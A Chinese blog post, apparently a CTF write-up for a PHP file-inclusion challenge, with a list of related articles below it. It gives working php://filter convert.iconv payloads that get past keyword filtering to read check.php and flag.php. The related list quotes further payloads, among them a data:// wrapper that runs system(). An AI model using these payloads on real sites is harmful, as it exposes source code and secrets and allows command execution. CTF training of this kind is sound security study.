file_include(攻防世界)

最新推荐文章于 2024-05-12 17:07:52 发布
最新推荐文章于 2024-05-12 17:07:52 发布
阅读量7.1k 收藏 37
点赞数 10
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56107268/article/details/127846196
版权 
<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

 使用php://filter 发现不行,猜测应该被过滤了

 继续尝试,发现read,base64,encode等关键字符被过滤了

 

 了解到php中有两种转换器

 发现string被过滤,只能使用convert了

 convert.*过滤器支持convert.iconv.* 格式,使用方法:

convert.iconv.<input-encoding>.<output-encoding>
 或
convert.iconv.<input-encoding>/<output-encoding> 

例如:

convert.iconv.UCS-4*.UCS-4BE   --->  将指定的文件从UCS-4*转换为UCS-4BE 输出

构造url,然后使用bp进行爆破

?filename=php://filter/convert.iconv.a.b/resource=check.php

php支持的编码格式(部分)

  • UCS-4*
  • UCS-4BE
  • UCS-4LE*
  • UCS-2
  • UCS-2BE
  • UCS-2LE
  • UTF-32*
  • UTF-32BE*
  • UTF-32LE*
  • UTF-16*
  • UTF-16BE*
  • UTF-16LE*
  • UTF-7
  • UTF7-IMAP
  • UTF-8*
  • ASCII*
  • EUC-JP*
  • SJIS*
  • eucJP-win*
  • SJIS-win*
  • ISO-2022-JP
  • ISO-2022-JP-MS
  • CP932
  • CP51932
  • SJIS-mac(别名:MacJapanese)
  • SJIS-Mobile#DOCOMO(别名:SJIS-DOCOMO)
  • SJIS-Mobile#KDDI(别名:SJIS-KDDI)
  • SJIS-Mobile#SOFTBANK(别名:SJIS-SOFTBANK)
  • UTF-8-Mobile#DOCOMO(别名:UTF-8-DOCOMO)
  • UTF-8-Mobile#KDDI-A
  • UTF-8-Mobile#KDDI-B(别名:UTF-8-KDDI)
  • UTF-8-Mobile#SOFTBANK(别名:UTF-8-SOFTBANK)
  • ISO-2022-JP-MOBILE#KDDI(别名:ISO-2022-JP-KDDI)

 

选取一种编码组合,UTF-7,UCS-4LE* 

 

 猜测flag在falg.php 

?filename=php://filter/convert.iconv.UTF-8*.UCS-4LE*/resource=flag.php

 

 

坠水
关注
  • 10
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
PHP 原生类学习与利用
snowlyzz的博客
09-22 1374
php 原生类利用与学习。
攻防世界 fileinclude
qq_73861475的博客
05-20 487
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开题目进入环境,在此之前题目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
攻防世界-web-file_include
最新发布
MateSnake的博客
05-12 470
攻防世界-web-file_include
攻防世界-file_include
m0_49025459的博客
12-18 6933
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
File Inclusion(文件包含)
qq_63963927的博客
10-19 188
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。漏洞原因:程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用任意文件,造成文件包含漏洞。
攻防世界-fileclude
m0_49025459的博客
12-28 1172
访问题目场景阅读php代码构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
Web安全攻防世界03 file_include(江苏工匠杯)
weixin_42789937的博客
11-27 1438
Web安全攻防世界03 file_include(江苏工匠杯),文件包含入门题目,依旧参考大佬的WP有所补充,内容对小白友好~
php 使用file_get_contents读取大文件的方法
10-25
本文介绍了在php中使用file_get_contents函数读取大文件的方法,并附上了示例以及使用小技巧,非常的实用,这里推荐给大家
Header_File_Path_Link.rar_header_file_path
09-21
标题“Header_File_Path_Link.rar_header_file_path”暗示了我们关注的重点是如何在IAR开发环境中设置和链接头文件路径。IAR Embedded Workbench是一款广泛使用的嵌入式系统开发工具,提供了一流的编译器、调试器和...
file_4714318736917740.pdf
12-19
file_4714318736917740
解决PHP curl或file_get_contents下载图片损坏或无法打开的问题
10-16
今天小编就为大家分享一篇解决PHP curl或file_get_contents下载图片损坏或无法打开的问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
MySQL修改innodb_data_file_path参数的一些注意事项
01-21
innodb_data_file_path用来指定innodb tablespace文件,如果我们不在My.cnf文件中指定innodb_data_home_dir和innodb_data_file_path那么默认会在datadir目录下创建ibdata1 作为innodb tablespace。 说明 在测试环境...
php特性(持续更新)
weixin_74427106的博客
03-29 270
它让我们不要输出数字,还需要让num为数字,但看到intval 我们就需要敏感;intval函数还有这一特点:intval处理一个数组对象时,会返回1;php特性一些函数的使用。先分析一下这个php代码。一下两个函数官方的解释。
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4177
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1472
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
PHP代码审计基础:任意文件读取及删除漏洞
1匹黑马
12-03 1179
文章目录任意文件读取危害挖掘思路测试代码任意文件删除危害 任意文件读取 通过提交专门设计的 输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件 危害 任意文件读取,是Web安全中的高危漏洞,它可以泄露源码,数据库配置文件等等,导致网站处于极度不安全的状态 挖掘思路 fopen() file_get_contents() fread() fgets() fgetss()
CTFshow web 文件包含
m0_56993542的博客
10-18 385
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
PHP代码审计12—反序列化漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1407
PHP反序列化入门
攻防世界新手file_include
06-01
"file_include" 是一种常见的 Web 漏洞类型之一,攻击者可以利用这种漏洞来包含并执行服务器上的文件。在攻防世界中,您可以通过学习 Web 安全知识来了解如何利用此类漏洞进行攻击和防御。建议您先学习一些基本的 Web 安全知识,例如 HTTP 协议、Web 应用程序的工作原理、常见的 Web 攻击技术(如 XSS、SQL 注入、文件包含等),以及如何使用工具进行漏洞扫描和利用。您可以通过搜索相关的在线课程、书籍、博客文章等来学习这些知识。同时,在攻防世界中,您还可以通过完成一些相关的挑战来提高您的技能水平。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值